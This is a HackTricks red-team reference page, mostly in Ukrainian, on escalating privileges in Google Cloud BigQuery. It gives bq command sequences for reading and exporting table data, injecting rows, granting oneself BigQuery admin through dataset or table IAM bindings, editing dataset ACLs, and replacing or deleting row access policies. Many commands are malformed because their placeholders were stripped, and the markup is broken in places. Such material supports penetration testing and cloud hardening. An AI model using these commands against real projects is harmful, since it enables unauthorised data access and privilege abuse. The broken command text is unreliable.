GCP - BigQuery Privesc

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks

BigQuery

Для отримання додаткової інформації про BigQuery див.:

GCP - Bigquery Enum

Читання таблиці

Читання інформації, що зберігається в таблиці BigQuery, може дозволити знайти sчутливу інформацію. Щоб отримати доступ до цієї інформації потрібні дозволи: bigquery.tables.get, bigquery.jobs.create та bigquery.tables.getData:

Читання даних таблиці BigQuery ```bash bq head . bq query --nouse_legacy_sql 'SELECT * FROM `..` LIMIT 1000' ```

Експорт даних

Це ще один спосіб отримати доступ до даних. Експортуйте його в bucket Cloud Storage і завантажте файли з інформацією.
Щоб виконати цю дію, потрібні наступні дозволи: bigquery.tables.export, bigquery.jobs.create та storage.objects.create.

Експортувати таблицю BigQuery у Cloud Storage ```bash bq extract .
"gs:///table*.csv" ```

Додавання даних

Можливо ввести певні довірені дані в таблицю Bigquery, щоб зловживати вразливістю в іншому місці. Це можна легко зробити за наявності дозволів bigquery.tables.get, bigquery.tables.updateData та bigquery.jobs.create:

Вставити дані в таблицю BigQuery ```bash # Via query bq query --nouse_legacy_sql 'INSERT INTO `..` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

Via insert param

bq insert dataset.table /tmp/mydata.json

</details>

### `bigquery.datasets.setIamPolicy`

Атакувальник може зловживати цим привілеєм, щоб **надати собі додаткові дозволи** над набором даних BigQuery:

<details>
<summary>Встановити IAM-політику для набору даних BigQuery</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

Лише цей дозвіл дозволяє оновити ваш доступ до набору даних у BigQuery, редагуючи ACLs, які вказують, хто може отримати доступ:

Оновити ACLs набору даних у BigQuery ```bash # Download current permissions, reqires bigquery.datasets.get bq show --format=prettyjson : > acl.json ## Give permissions to the desired user bq update --source acl.json : ## Read it with bq head $PROJECT_ID:.
```

bigquery.tables.setIamPolicy

Attacker може зловживати цим привілеєм, щоб наділити себе додатковими permissions над таблицею BigQuery:

Встановити IAM політику для таблиці BigQuery ```bash # For this you also need bigquery.tables.setIamPolicy bq add-iam-policy-binding \ --member='user:' \ --role='roles/bigquery.admin' \ :.

use the set-iam-policy if you don’t have bigquery.tables.setIamPolicy

</details>

### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`

Згідно з документацією, з вказаними дозволами можливо **оновити політику доступу до рядків.**\
Однак, **використовуючи CLI `bq`** потрібні ще деякі: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.

<details>
<summary>Створити або замінити політику доступу до рядків</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used

Можна знайти filter ID у виводі row policies enumeration. Приклад:

List row access policies ```bash bq ls --row_access_policies :.

Id Filter Predicate Grantees Creation Time Last Modified Time

apac_filter term = “Cfba” user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09

</details>

Якщо у вас є **`bigquery.rowAccessPolicies.delete`** замість `bigquery.rowAccessPolicies.update`, ви також можете просто видалити політику:

<details>
<summary>Видалити політики доступу до рядків</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Caution

Ще один можливий спосіб обійти row access policies — просто змінити значення обмежених даних. Якщо ви можете бачити лише коли term = Cfba, просто змініть всі записи таблиці так, щоб term = "Cfba". Однак це запобігається bigquery.

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks